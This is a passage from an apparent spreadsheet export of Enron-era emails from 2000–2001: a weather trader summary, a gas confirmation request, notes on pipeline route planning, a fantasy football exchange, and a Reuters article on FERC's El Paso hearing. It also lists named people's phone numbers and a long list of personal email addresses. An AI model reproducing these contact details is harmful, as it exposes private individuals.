AAC(NE) 51 +2 MAIN(CTR) 47 NC MAPP(HP) 49 -1 NPCC(NE) 48 +2 SERC(SE) 59 NC =_x000D_
SPP(SP) 65 NC WSCC(NW) 55 NC WSCC(RK) 66 +2 WSCC(SW) 72 NC     Range Standa=_x000D_
rd Deviation [IMAGE] [IMAGE]   Reg CT HP NE NW RK SE SP SW Mean 40 56 43 51=_x000D_
 61 56 69 69 Max 47 62 48 57 68 61 74 73 Min 34 49 40 47 53 50 60 65 Range =_x000D_
13 13 8 10 15 11 14 8 StD-P 3.5 4.4 2.7 2.7 5.2 3.0 4.6 2.2 Count 8 8 8 8 8=_x000D_
 8 8 8   Day 4: Sunday, October 28, 2001   Syncrasy's Choice:  Delta Temp. =_x000D_
  Volatility Matrix    [IMAGE][IMAGE]  [IMAGE][IMAGE]  [IMAGE][IMAGE]    [I=_x000D_
MAGE]   ECAR(CTR) 50 NC ERCOT(SP) 76 +1 FRCC(SE) 70 -1 MAAC(NE) 50 NC MAIN(=_x000D_
CTR) 55 NC MAPP(HP) 59 +2 NPCC(NE) 47 NC SERC(SE) 60 -1 SPP(SP) 70 +1 WSCC(=_x000D_
NW) 54 NC WSCC(RK) 62 +1 WSCC(SW) 70 +1     Range Standard Deviation [IMAGE=_x000D_
] [IMAGE]   Reg CT HP NE NW RK SE SP SW Mean 46 57 41 48 58 54 69 64 Max 55=_x000D_
 63 48 54 65 61 75 70 Min 42 51 37 45 52 49 64 62 Range 13 12 11 9 13 12 11=_x000D_
 8 StD-P 3.9 3.9 2.9 2.1 4.1 3.4 3.3 2.5 Count 6 6 6 6 6 6 6 6   Day 5: Mon=_x000D_
day, October 29, 2001   Syncrasy's Choice:  Delta Temp.   Volatility Matrix=_x000D_
    [IMAGE][IMAGE]  [IMAGE][IMAGE]  [IMAGE][IMAGE]    [IMAGE]   ECAR(CTR) 5=_x000D_
7 +1 ERCOT(SP) 76 +1 FRCC(SE) 76 -1 MAAC(NE) 58 +1 MAIN(CTR) 57 NC MAPP(HP)=_x000D_
 54 NC NPCC(NE) 52 +1 SERC(SE) 66 -1 SPP(SP) 70 -1 WSCC(NW) 55 +1 WSCC(RK) =_x000D_
58 -1 WSCC(SW) 68 +3     Range Standard Deviation [IMAGE] [IMAGE]   Reg CT =_x000D_
HP NE NW RK SE SP SW Mean 50 54 47 49 54 58 69 63 Max 56 58 54 55 61 67 75 =_x000D_
69 Min 45 50 43 46 49 52 63 60 Range 11 8 11 9 12 15 12 9 StD-P 4.3 3.2 3.1=_x000D_
 2.2 3.6 4.7 4.3 2.5 Count 6 6 6 6 6 6 6 6    Day 6-10 Discussion:  I don't=_x000D_
 have a lot of change from yesterdays 6-10 day outlook other than advancing=_x000D_
 things by one day. Warming that kicks in for the Plains advances East.Rela=_x000D_
tive to normal this will be more pronounced initially in the North than the=_x000D_
 South though by late in the period all will share. I mentioned an atmosphe=_x000D_
ric turnaround yesterday and still feel there is potential by the middle of=_x000D_
 next week to become almost as warm as the recent warm episode. The pattern=_x000D_
 remains progressive, but not as volatile as recent weeks. Charts show anot=_x000D_
her trough pushing through the Plains and Eastern U.S. but it does not have=_x000D_
 the amplitude that the current one does. Therefore, it can't tap the arcti=_x000D_
c air and bring it down. I have a fairly high confidence level that the fir=_x000D_
st week of November will be mild for the nation as a whole.  Day 6: Tuesday=_x000D_
, October 30, 2001   Syncrasy's Choice:  Delta Temp.   Volatility Matrix   =_x000D_
 [IMAGE][IMAGE]  [IMAGE][IMAGE]  [IMAGE][IMAGE]    [IMAGE]   ECAR(CTR) 57 -=_x000D_
2 ERCOT(SP) 75 NC FRCC(SE) 79 -1 MAAC(NE) 59 NC MAIN(CTR) 56 -1 MAPP(HP) 52=_x000D_
 -4 NPCC(NE) 53 -2 SERC(SE) 69 NC SPP(SP) 71 +2 WSCC(NW) 54 NC WSCC(RK) 56 =_x000D_
+2 WSCC(SW) 67 +2     Range Standard Deviation [IMAGE] [IMAGE]   Reg CT HP =_x000D_
NE NW RK SE SP SW Mean 50 56 47 48 51 60 66 61 Max 55 58 54 54 57 71 74 68 =_x000D_
Min 47 54 44 44 48 57 60 58 Range 8 4 10 10 9 14 14 10 StD-P 2.7 1.5 3.0 2.=_x000D_
6 2.6 4.1 4.6 2.7 Count 5 5 5 5 5 5 5 5   Day 7: Wednesday, October 31, 200=_x000D_
1   Syncrasy's Choice:  Delta Temp.   Volatility Matrix    [IMAGE][IMAGE]  =_x000D_
[IMAGE][IMAGE]  [IMAGE][IMAGE]    [IMAGE]   ECAR(CTR) 58 -1 ERCOT(SP) 76 -1=_x000D_
 FRCC(SE) 81 NC MAAC(NE) 58 -4 MAIN(CTR) 58 NC MAPP(HP) 55 -2 NPCC(NE) 50 -=_x000D_
5 SERC(SE) 70 NC SPP(SP) 68 +1 WSCC(NW) 54 NC WSCC(RK) 54 NC WSCC(SW) 67 +1=_x000D_
     Range Standard Deviation [IMAGE] [IMAGE]   Reg CT HP NE NW RK SE SP SW=_x000D_
 Mean 53 55 46 48 46 64 68 62 Max 57 58 52 54 55 72 74 67 Min 50 52 41 44 4=_x000D_
0 61 65 58 Range 7 6 11 10 15 11 9 9 StD-P 2.1 2.2 4.1 3.0 6.0 3.1 3.0 3.1 =_x000D_
Count 5 5 5 5 5 5 5 5   Day 8: Thursday, November  1, 2001   Syncrasy's Cho=_x000D_
ice:  Delta Temp.   Volatility Matrix    [IMAGE][IMAGE]  [IMAGE][IMAGE]  [I=_x000D_
MAGE][IMAGE]    [IMAGE]   ECAR(CTR) 54 NC ERCOT(SP) 71 +1 FRCC(SE) 73 -1 MA=_x000D_
AC(NE) 57 +1 MAIN(CTR) 55 NC MAPP(HP) 53 -1 NPCC(NE) 51 -1 SERC(SE) 65 +1 S=_x000D_
PP(SP) 65 +4 WSCC(NW) 43 NC WSCC(RK) 42 +2 WSCC(SW) 61 +2     Range Standar=_x000D_
d Deviation [IMAGE] [IMAGE]   Reg CT HP NE NW RK SE SP SW Mean 55 54 54 47 =_x000D_
47 68 71 64 Max 58 57 56 54 54 73 75 68 Min 54 52 53 43 42 67 68 61 Range 4=_x000D_
 5 3 11 12 6 7 7 StD-P 1.0 1.6 1.4 4.1 4.3 1.9 1.6 3.1 Count 5 5 5 5 5 5 5 =_x000D_
5   Day 9: Friday, November  2, 2001   Syncrasy's Choice:  Delta Temp.   Vo=_x000D_
latility Matrix    [IMAGE][IMAGE]  [IMAGE][IMAGE]  [IMAGE][IMAGE]    [IMAGE=_x000D_
]   ECAR(CTR) 57 +1 ERCOT(SP) 71 +1 FRCC(SE) 74 -1 MAAC(NE) 58 -1 MAIN(CTR)=_x000D_
 58 +3 MAPP(HP) 49 +1 NPCC(NE) 54 -1 SERC(SE) 65 +1 SPP(SP) 62 +2 WSCC(NW) =_x000D_
46 -2 WSCC(RK) 39 +1 WSCC(SW) 62 NC     Range Standard Deviation [IMAGE] [I=_x000D_
MAGE]   Reg CT HP NE NW RK SE SP SW Mean 55 50 55 47 44 67 69 65 Max 56 59 =_x000D_
55 49 55 69 69 69 Min 52 46 54 46 38 66 69 62 Range 4 13 1 3 17 3 0 7 StD-P=_x000D_
 1.4 4.4 0.6 1.1 5.5 0.9 0.2 2.7 Count 4 4 4 4 4 4 4 4   Day 10: Saturday, =_x000D_
November  3, 2001   Syncrasy's Choice:  Delta Temp.   Volatility Matrix    =_x000D_
[IMAGE][IMAGE]  [IMAGE][IMAGE]  [IMAGE][IMAGE]    [IMAGE]   ECAR(CTR) 55 +3=_x000D_
 ERCOT(SP) 65 -1 FRCC(SE) 75 NC MAAC(NE) 61 +2 MAIN(CTR) 50 +4 MAPP(HP) 49 =_x000D_
+3 NPCC(NE) 56 -1 SERC(SE) 66 NC SPP(SP) 55 +4 WSCC(NW) 45 -6 WSCC(RK) 47 +=_x000D_
1 WSCC(SW) 65 NC     Range Standard Deviation [IMAGE] [IMAGE]   Reg CT HP N=_x000D_
E NW RK SE SP SW Mean 48 45 54 43 40 65 62 57 Max 52 51 57 45 48 67 65 64 M=_x000D_
in 39 36 49 38 31 62 59 49 Range 13 15 8 7 17 5 6 15 StD-P 4.8 6.0 3.5 2.7 =_x000D_
8.1 2.5 1.6 7.3 Count 4 4 4 4 4 4 4 4    Trader Summary is designed around =_x000D_
and formatted for the  [IMAGE]Plasma displays, RainbowWall? and DataWall?  =_x000D_
 Trader Summary can also be viewed from www.syncrasy.com  or     www.apbene=_x000D_
rgy.com  or  www.truequote.com     [IMAGE]  =09_x000D_
=09=09=09_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Nov 2001 07:14:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sean.riordan@enron.com'})</t>
  </si>
  <si>
    <t>CSN Sitara #1149783</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sean,_x000D_
_x000D_
I need a modified confirmation to be prepared ASAP for CSN.  The terms are:_x000D_
_x000D_
Price:		$3.11 per MMBtu_x000D_
_x000D_
Term:		November 1-30, 2001_x000D_
_x000D_
Delivery Point:	Interconnection between Midwestern Gas Transmission and Vectren Gas Pipeline (Meter Mo. 027093)_x000D_
_x000D_
Volume:	November 1-21, 2001 will be 900 MMBtu/d_x000D_
_x000D_
		November 22-25, 2001 will be 500 MMBtu/d_x000D_
_x000D_
		November 26-30, 2001 will be 900 MMBtu/d_x000D_
_x000D_
Special_x000D_
Provisions:	ENA agrees to purchase the excess volume (above actual consumption) on a daily basis at the "daily midpoint" price 		set forth in Gas Daily Platts, a division of the McGraw-Hill Companies, in the column "Daily Price Survey" under_x000D_
		the listing Chicago-LDC, large end-users for the relevant gas day._x000D_
_x000D_
		CSN agrees to purchase deficient volumes (above actual nomination) on a daily basis at the "daily midpoint" price 			set forth in Gas Daily Platts, a division of the McGraw-Hill Companies, in the column "Daily Price Survey" under_x000D_
		the listing Chicago-LDC, large end-users for the relevant gas day._x000D_
_x000D_
The contact at CSN is Pat Monaghan_x000D_
Phone # is 812-299-8866  Ext. 1132_x000D_
Fax # is 812-299-3777_x000D_
_x000D_
_x000D_
_x000D_
I would like to see this confirmation before it is actually sent to CSN._x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Aug 2001 13:55:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.walton@enron.com', 'm..landwehr@enron.com', 'luiz.maurer@enron.com', 'robert.neustaedter@enron.com', 'david.mangskau@enron.com', 'susan.scott@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e..rosenberg@enron.com', 'robert.frank@enron.com', 'jerry.boston@enron.com', 'gloria.ogenyi@enron.com', 'maria.arefieva@enron.com', 'alberto.levy@enron.com', 'allison.hamilton@enron.com', 'lysa.tracy@enron.com', 'roy.boston@enron.com', 'john.neslage@enron.com', 'amy.kim@enron.com', 'stephen.burns@enron.com', 'linda.robertson@enron.com', 'stella.chan@enron.com', 'bevin.hunter@enron.com', 'john.shelk@enron.com', 'j..kean@enron.com', 'carmen.perez@enron.com', 'bill.moore@enron.com', 'eric.benson@enron.com', 'carin.nersesian@enron.com', 'steve.montovano@enron.com', 'scott.reblitz@enron.com', 'ginger.dernehl@enron.com', 'kirsten.bellas@enron.com', 'helen.rizzo@enron.com', 'aleck.dadson@enron.com', 'karen.huang@enron.com', 'a..gomez@enron.com', 'denis.tu@enron.com', 'shelley.corman@enron.com', 'jean.dressler@enron.com', 'kimberly.watson@enron.com', 'darran.binns@enron.com', 'kikumi.kishigami@enron.com', 'elizabeth.linnell@enron.com', 'jeff.dasovich@enron.com', 'bernadette.hawkins@enron.com', 'jack.boatman@enron.com', 'l..lawrence@enron.com', 'donald.lassere@enron.com', 'j..noske@enron.com', 'stephen.dowd@enron.com', 'lindy.donoho@enron.com', 'pat.shortridge@enron.com', 'ramon.alvarez@enron.com', 'alan.comnes@enron.com', 'rubena.buerger@enron.com', 'geriann.warner@enron.com', 'melinda.pharms@enron.com', 'patrick.keene@enron.com', 'miyung.buster@enron.com', 'robert.hayes@enron.com', 'john.hardy@enron.com', 'sarah.novosel@enron.com', 'rob.bradley@enron.com', 'leslie.lawner@enron.com', 'l..nicolay@enron.com', 'jean.mrha@enron.com', 'joe.allen@enron.com', 'steven.harris@enron.com', 'nancy.hetrick@enron.com', 'lara.leibman@enron.com', 'daniel.allegretti@enron.com', 'l..petrochko@enron.com', 'fino.tiberi@enron.com', 'janel.guerrero@enron.com', 'carolyn.cooney@enron.com', 'maureen.mcvicker@enron.com', 'germain.palmer@enron.com', 'richard.ingersoll@enron.com', 'tom.briggs@enron.com', 'terri.miller@enron.com', 'robert.hemstock@enron.com', 'donna.fulton@enron.com', 'w..cantrell@enron.com', 'sam.leonardo@enron.com', 'dave.perrino@enron.com', 'andy.rodriquez@enron.com', 'dan.staines@enron.com', 'lora.sullivan@enron.com', 'stanley.horton@enron.com', 'margaret.huson@enron.com', 'richard.shapiro@enron.com', 'larry.decker@enron.com', 'jennifer.thome@enron.com', 'joseph.alamo@enron.com', 'd..steffes@enron.com', 'janine.migden@enron.com', 'charles.yeung@enron.com', 'howard.fromer@enron.com', 'bill.cordes@enron.com', 'jean.ryall@enron.com', 'kerry.stroup@enron.com', 'danny.mccarty@enron.com', 'laurie.knight@enron.com'})</t>
  </si>
  <si>
    <t>August Gas Flows</t>
  </si>
  <si>
    <t>The August issue of Gas Flows looks at the short term natural gas prices and forecasted demand._x000D_
_x000D_
 _x000D_
_x000D_
Rita Hartfield_x000D_
Phone:  713-853-5854_x000D_
Fax:  713-646-4702_x000D_
Cell:  713-504-5428_x000D_
Rita.Hartfield@enron.com</t>
  </si>
  <si>
    <t>Fri, 31 Aug 2001 09:36:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Sun Devil - Helicopter Fly-Over of Routes</t>
  </si>
  <si>
    <t xml:space="preserve">John, I plan on grabbing not only a digital camera but also my video camera to handle the panarama part of the equations.  In conversations with Doug Cebryk, it looks like the primary routes are Interstate 17 and El Paso's existing right of way south.  I spoke with Kevin Hyatt about a possible route that exists south to a power plant between station 1 and Kingman Az, and then heading southeast into the Phoenix area, but didnt know if the economics would work out. Ive got ENSR looking at other routes that might hold promise.  I also plan on addressing what might be considered sensitive areas of potential impact (streams, rivers, riparian habitat, difficult terrain, population and  critical habitat  issues etc)  Ill have a report to you shortly after the trip..._x000D_
_x000D_
_x000D_
From:	John Shafer/ENRON@enronXgate on 08/31/2001 08:33 AM CDT_x000D_
To:	Larry Campbell/ET&amp;S/Enron@ENRON_x000D_
cc:	Mike Riedel/ET&amp;S/Enron@ENRON, William Kendrick/ENRON@enronXgate, Louis Soldano/ENRON@enronXgate, jschmidt@ENSR.com@SMTP@enronXgate, Eric Gadd/ENRON@enronXgate, Kevin Hyatt/ENRON@enronxgate, Doug Cebryk/ENRON@enronXgate, Randy Rice/ENRON@enronXgate, Stephen Veatch/ENRON@enronXgate, Joe Hartsoe/ENRON@enronXgate, Gina Taylor/ENRON@enronXgate _x000D_
_x000D_
Subject:	Sun Devil - Helicopter Fly-Over of Routes_x000D_
_x000D_
 		_x000D_
_x000D_
_x000D_
Larry,_x000D_
_x000D_
Please give me a report following your fly-over of the route with Doug Cebryk.  I am very interested in what you see and the potentials that are there.  Don't forget to take your camera.  Pictures (slides) would be most helpful as we work through the early planning stages for the greenfield portion.  As the primary route begins to solidify with alternates, we will need to develop some preliminary maps.  It is my understanding that no maps of the route will be released with sign-off from the entire group of: Hyatt, Taylor, Veatch and Shafer._x000D_
_x000D_
After we receive the "fatal-flaw" desk-top analysis from ENSR (Sept. 21 - although I hope to get it sooner), I would offer that several events should be scheduled to expedite the project as follows:_x000D_
1. If the open season reflects that we have a project and Eric Gadd approves, a couple of quick meetings will be held with strategic groups to discuss the project potential (TNC, State Land Managing agencies, US Forest Service, etc).  These strategic groups will be identified by the ENSR fatal-flaw analysis._x000D_
2. Simultaneously, we will begin working with ENSR (if the open season reflects that we have a project) on developing a full scoped Environmental Strategy for Sun Devil (this will include an RFP that will immediately go out soliciting bids for the Resource Reports and permits). _x000D_
3. We will work with Steve Veatch and Joe Hartso to schedule a meeting with the FERC Staff (we need the commitment of the State Land Managing Agencies, US Forest Service, etc. to collaborate with the FERC on the NEPA review) to introduce the project and solicit their commitment to offer staff resources early in the process._x000D_
4. We will also need to develop a Public Relations and Government Affairs strategy which will identify the early meetings that need to be held with local, state, federal jurisdictional governing bodies and politicians - so the right folks have a heads-up on the project before it hits the news media.  This also includes developing a strategy on where and when the project will formally be announced (i.e., news conference in Phoenix or Houston, etc.).  A $580 Million project will be a big deal in the Phoenix area and for the Southwest._x000D_
_x000D_
I know there is more, but this will help to keep some of the early events coordinated.  John Shafer_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 00:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Engram</t>
  </si>
  <si>
    <t xml:space="preserve">your boy is being ridiculous - does he really think he will get the 10th best _x000D_
rb for the 30th receiver?_x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 08/24/2000 07:01 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
LQCOLOMBO@aol.com on 08/23/2000 06:12:52 PM_x000D_
To: Eric.Bass@enron.com_x000D_
cc:  _x000D_
Subject: Re: Engram_x000D_
_x000D_
_x000D_
In a message dated 8/23/00 7:23:30 AM Pacific Daylight Time,_x000D_
Eric.Bass@enron.com writes:_x000D_
_x000D_
&lt;&lt; What Do you want for Engram? &gt;&gt;_x000D_
_x000D_
At the very least, Corey Dillon_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Jun 2001 03:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'steve.walton@enron.com', 'donna.fulton@enron.com', 'dave.perrino@enron.com', 'jalexander@gibbs-bruns.com', 'don.black@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'tori.kuykendall@enron.com', 'jennifer.thome@enron.com', 'leslie.lawner@enron.com', 'roger.ponce@enron.com', 'robert.superty@enron.com', 'phillip.allen@enron.com', 'randall.gay@enron.com', 'suzanne.calcagno@enron.com', 'barry.tycholiz@enron.com', 'robert.frank@enron.com', 'jane.tholt@enron.com', 'ed.mcmichael@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'christi.nicolay@enron.com', 'jess.hewitt@enron.com', 'patti.sullivan@enron.com', 'stephanie.miller@enron.com'})</t>
  </si>
  <si>
    <t>FERC expands El Paso Pipeline hearing on Calif</t>
  </si>
  <si>
    <t xml:space="preserve">Looks like this won't be over soon._x000D_
_x000D_
---------------------- Forwarded by Rebecca W Cantrell/HOU/ECT on 06/12/2001 _x000D_
10:50 AM ---------------------------_x000D_
_x000D_
_x000D_
"Tracey Bradley" &lt;tbradley@bracepatt.com&gt; on 06/12/2001 08:09:43 AM_x000D_
To: &lt;jlimone@aeglobalmarkets.com&gt;, "Aryeh Fishman" &lt;afishman@bracepatt.com&gt;, _x000D_
"Andrea Settanni" &lt;asettanni@bracepatt.com&gt;, "Charles Shoneman" _x000D_
&lt;cshoneman@bracepatt.com&gt;, "Kimberly Curry" &lt;kcurry@bracepatt.com&gt;, "Paul _x000D_
Fox" &lt;pfox@bracepatt.com&gt;, "Ronald Carroll" &lt;rcarroll@bracepatt.com&gt;, _x000D_
"Randall Rich" &lt;rrich@bracepatt.com&gt;, &lt;agold@coral-energy.com&gt;, _x000D_
&lt;rreilley@coral-energy.com&gt;, &lt;joe.hartsoe@enron.com&gt;, _x000D_
&lt;Rebecca.W.Cantrell@enron.com&gt;, &lt;pat.cradock@huskyenergy.ca&gt;, _x000D_
&lt;doug.little@powerex.com&gt;_x000D_
cc: "Duscha Brown" &lt;dbrown@bracepatt.com&gt; _x000D_
_x000D_
Subject: FERC expands El Paso Pipeline hearing on Calif_x000D_
_x000D_
_x000D_
A copy of FERC's order reopening the investigation into affiliate abuse is _x000D_
attached._x000D_
_x000D_
Monday June 11, 10:08 pm Eastern Time_x000D_
FERC expands El Paso Pipeline hearing on Calif_x000D_
(UPDATE: adds NYMEX closing price)_x000D_
_x000D_
By Julie Vorman_x000D_
_x000D_
WASHINGTON, June 11 (Reuters) - U.S. regulators on Monday expanded a legal _x000D_
proceeding into whether El Paso Corp (NYSE:EPG - news) affiliates improperly _x000D_
shared information to boost the price of natural gas deliveries into _x000D_
energy-starved California._x000D_
_x000D_
The Federal Energy Regulatory Commission (FERC) reversed an earlier decision _x000D_
and granted a request by the California Public Utilities Commission for a _x000D_
hearing on the activities of El Paso Pipeline, El Paso Merchant Energy-Gas _x000D_
L.P., and Mojave Pipeline Co._x000D_
_x000D_
All are involved in shipping natural gas into California, where utilities _x000D_
depend on the fuel to run electricity generating plants._x000D_
_x000D_
The California Public Utilities Commission alleged that the El Paso _x000D_
affiliates' three shipping contracts for 1,220 million cubic feet per day of _x000D_
guaranteed capacity to California were rigged to boost prices during much of _x000D_
last year. Utilities and state regulators claim the high prices cost _x000D_
Californians an extra $3.7 billion, a figure disputed by El Paso._x000D_
_x000D_
AFFILIATE ABUSE AT ISSUE_x000D_
_x000D_
FERC, which regulates interstate pipelines and electricity markets, had said _x000D_
in March that it found no sign of what is known in the industry as affiliate _x000D_
abuse. The agency has rules requiring arms-length deals within a corporate _x000D_
family._x000D_
_x000D_
``The commission now sets for hearing the issue of whether El Paso Pipeline _x000D_
and/or El Paso Merchant engaged in affiliate abuse or violated the affiliate _x000D_
standards in bidding for or awarding the El Paso contracts, including the _x000D_
transportation discount granted by Mojave,'' FERC said in the Monday order._x000D_
_x000D_
The new hearing will become part of an ongoing case in which FERC _x000D_
Administrative Law Judge Curtis Wagner is trying to determine if El Paso _x000D_
deliberately curbed gas shipments to boost prices._x000D_
_x000D_
Although California prices eased in recent days, they have soared as much as _x000D_
100 times higher than other states._x000D_
_x000D_
El Paso has denied any wrongdoing._x000D_
_x000D_
``The bottom line is that FERC had all the evidence before them when they _x000D_
made their initial decision (in March) that there was no affiliate abuse. And _x000D_
that evidence has not changed,'' said Norma Dunn, a spokeswoman for El Paso._x000D_
_x000D_
``We're very confident that they will rule in the same fashion again,'' she _x000D_
added._x000D_
_x000D_
In late March, FERC ordered the first El Paso proceeding to determine if the _x000D_
company exercised market power to drive up the price of natural gas in _x000D_
California. But FERC also rejected at that time allegations that El Paso _x000D_
Pipeline had improperly favored its affiliates during the so-called ``open _x000D_
season'' when pipelines accept bids for contract deliveries._x000D_
_x000D_
The new FERC action came after California regulators alleged that El Paso _x000D_
Merchant received secret information from Mojave during the open season._x000D_
_x000D_
``The commission now believes these allegations raise factual issues that are _x000D_
best resolved in an evidentiary hearing,'' the FERC order said._x000D_
_x000D_
Separately, Judge Wagner asked FERC for ``guidance'' on whether he should _x000D_
gather evidence on possible violations of the affiliate standards, which _x000D_
could have influenced prices._x000D_
_x000D_
PUNISHMENT REMAINS UNCLEAR_x000D_
_x000D_
On the New York Merchantile Exchange (NYMEX), Hub gas prices for July rallied _x000D_
25.7 cents, or almost seven percent, to close at $4.179 per million British _x000D_
thermal units (mmBtu) on Monday._x000D_
_x000D_
Under the FERC order, Judge Wagner has until June 21 to set a date for a _x000D_
hearing on the new issue._x000D_
_x000D_
The agency also said it was premature to identify what punishment is _x000D_
available if Judge Wagner determines that El Paso improperly exercised market _x000D_
power._x000D_
_x000D_
The expanded proceeding means that a Sept. 4 deadline for a decision by Judge _x000D_
Wagner has been suspended, FERC said._x000D_
_x000D_
The FERC order was endorsed by new FERC commissioner Pat Wood, a former Texas _x000D_
utilities regulator and confidant of President George W. Bush. Wood joined _x000D_
FERC earlier this month and is widely rumored to be in line to head the _x000D_
agency._x000D_
_x000D_
Current FERC chairman, Curtis Hebert, a Mississippi Republican, took over the _x000D_
leadership role in January at the insistence of then-Senate Majority Leader _x000D_
Trent Lott._x000D_
_x000D_
In a concurring opinion filed with the new FERC order, Wood wrote that the _x000D_
agency must ``act expeditiously'' on complaints. The El Paso allegations were _x000D_
first raised in April 2000 but FERC did not move on the case until nearly one _x000D_
year later._x000D_
_x000D_
``In overseeing competitive energy markets as a joint effort with our _x000D_
colleagues at state commissions, it is critical that the FERC be seen as a _x000D_
watchful and vigilant partner,'' Wood wrote. ``Expeditious referral and _x000D_
action on filed complaints is a central tool in our market oversight _x000D_
toolbox.''_x000D_
_x000D_
Hebert also wrote a concurring opinion, in which he said he was committed to _x000D_
a speedy resolution of the case._x000D_
_x000D_
 - rp00-241-000.pdf_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 07:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'andrew.miles@enron.com'})</t>
  </si>
  <si>
    <t>Revised StageCoach CSA</t>
  </si>
  <si>
    <t xml:space="preserve">Please review Section 7.3 and 7.4 closely._x000D_
_x000D_
_x000D_
_x000D_
I will be sending the revised LOI shortly._x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 08:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.blumenthal@enron.com', 'bob.shults@enron.com', 'frank.davis@enron.com', 'dale.neuner@enron.com', 'kal.shah@enron.com', 'jason.althaus@enron.com', 'debbie.brackett@enron.com', 'mark.taylor@enron.com', 'david.port@enron.com'})</t>
  </si>
  <si>
    <t>New Gas Transportation Product on EnronOnline</t>
  </si>
  <si>
    <t>The Global Gas Pipeline group is looking to trade gas transportation on _x000D_
EnronOnline.  The Initial products are expected to be day ahead and rest of _x000D_
the month transportation. Houston PipeLine and Northern Natural Gas Pipeline _x000D_
will be the initial pipelines posting bids and offers. The expected date of _x000D_
launch  is 8/23/00. We do not have the GTC or Product descriptions yet.  I _x000D_
will forward those to you'll as soon as I have them. In the meantime if _x000D_
you'll could please let me know if there are any legal, credit , tax, risk, _x000D_
and other concerns we should be addressing. Thanks a lot._x000D_
_x000D_
Savita</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 07:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'diane@gcvideo.com'})</t>
  </si>
  <si>
    <t>frozenset({'hollygolly505@yahoo.com', 'jeludwi@attglobal.net', 'jlhallnc@aol.com', 'dharrell@flash.net', 'cbiris@aol.com', 'stephenayoung@aol.com', 'mark.breece@honeywell.com', 'terry.stein@prodigy.net', 'abq-db@dormanbreen.com', 'joseph_barbone@afcc.com', 'albfamily@yahoo.com', 'al.houghton@phaser.com', 'ckreuch@aol.com', 'jegeorge@mail.com', 'mullimr@texaco.com', 'wbrinegar@email.msn.com', 'clkamm@yahoo.com', 'disteph@arn.net', 'jrec04@home.com', 'nmpooh@aol.com', 'flygirls@bwn.net', 'soilutions@aol.com', 'fotodaner@msn.com', 'statchem@aol.com', 'rorr@gte.net', 'dking@nmol.com', 'pamela_h@email.msn.com', 'sevans@pnm.com', 'marti@whidbey.com', 'vsix@mtaonline.net', 'john@wagemlab.com', 'anabunch@aol.com', 'nlcraig@altavista.com', 'khoffman@peoplepc.com', 'mmcatee@wgandg.com', 'john.buynak@verizon.net', 'chris.schroeder@hexcel.com', 'thelive99@aol.com', 'dwellwell@email.msn.com', 'zuk@uswest.net', 'dawna@tvi.cc.nm.us', 'vpyland@earthlink.net', 'morrell@sandia.gov', 'tlanders@hotmail.com', 'caswell@post.smu.edu', 'ray16kit@aol.com', 'kathy.bryan@mot.com', 'jane@joedooley.com', 'cl1852@msn.com', 'dr81972@aol.com', 'samteague2000@yahoo.com', 'ergonz@attglobal.net', 'tgvath@prodigy.net', 'k12@ne.uswest.net', 'gjkrantz@earthlink.net', 'thawk65@usa.net', 'greg-deb@coldwellbanker.com', 'mcoatney@esc5.net', 'mbartlet@bellatlantic.net', 'wnciii@worldnet.att.net', 'signsafari@hotmail.com', 'mybooth@bigfoot.com', 'russtang@netscape.net', 'perov@laplaza.org', 'oska177@aol.com', 'gary@wvcpas.com', 'gooders@aol.com', 'palowe@bigplanet.com', 'jcoleman@brazosport.cc.tx.us', 'a.zeutzius@prodigy.net', 'dayspring_87002@yahoo.com', 'j-c-hutchins@att.net', 'cmiller@sandia.gov', 'ccline52@hotmail.com', 'wandjbutler@cs.com', 'larbjan@uswest.net', 'carolb@dpsabq.com', 'vistadanna@aol.com', 'cameron@ccis.com', 'barbtega@hotmail.com', 'ssdpc@aol.com', 'muniz@spinn.net', 'sproche@aol.com', 'vic-mel@worldnet.att.net', 'chipslda@aol.com', 'bssjcase@aol.com', 'viperf20@aol.com', 'mvwhedges@aol.com', 'rrudyrc@cs.com', 'gloria.emmett@med.va.gov', 'garrett@cyberport.com', 'mitch5@flash.net', 'sbuwalda@aol.com', 'gjg613@aol.com', 'chgarcia@att.net', 'dcoop3322@altavista.net', 'marshathom20@cs.com', 'diane@gcvideo.com', 'goldendott@aol.com', 'kwhaley@prodigy.net', 'carl@bexar-electric.com', 'philz61@hotmail.com', 'bayrisa@flash.net', 'tdettweiler@cbrichardellis.com', 'annelle_griffin@scps.k12.fl.us', 'jsafarrow@prodigy.net', 'wizard05@aol.com', 'amcmurr@mail.pnm.com', 'garydoll@aol.com', 'patbrownl@aol.com', 'mar2par@aol.com', 'kco9188441@aol.com', 'levnas@excite.com', 'penniquilts@home.com', 'lcampbe@enron.com', 'stringerteresa@netscape.net', 'thomcat@franks-supply.com', 'robbins_a@aps.edu', 'dave5th@aol.com', 'fgorenz@geraldmartin.com', 'lkoster565@aol.com', 'c.s.rutherford@att.net', 'jbosq@aol.com', 'richard_thwaits@byu.edu', 'debbev@chickmail.com', 'easyriders@msn.com', 'goldw1202@aol.com', 'lm1270@juno.com', 'jkaehr@aol.com', 'charles@futures.com', 'dbreshea@clackesd.k12.or.us', 'lkotke@arthritis.org', 'rinoso@aol.com', 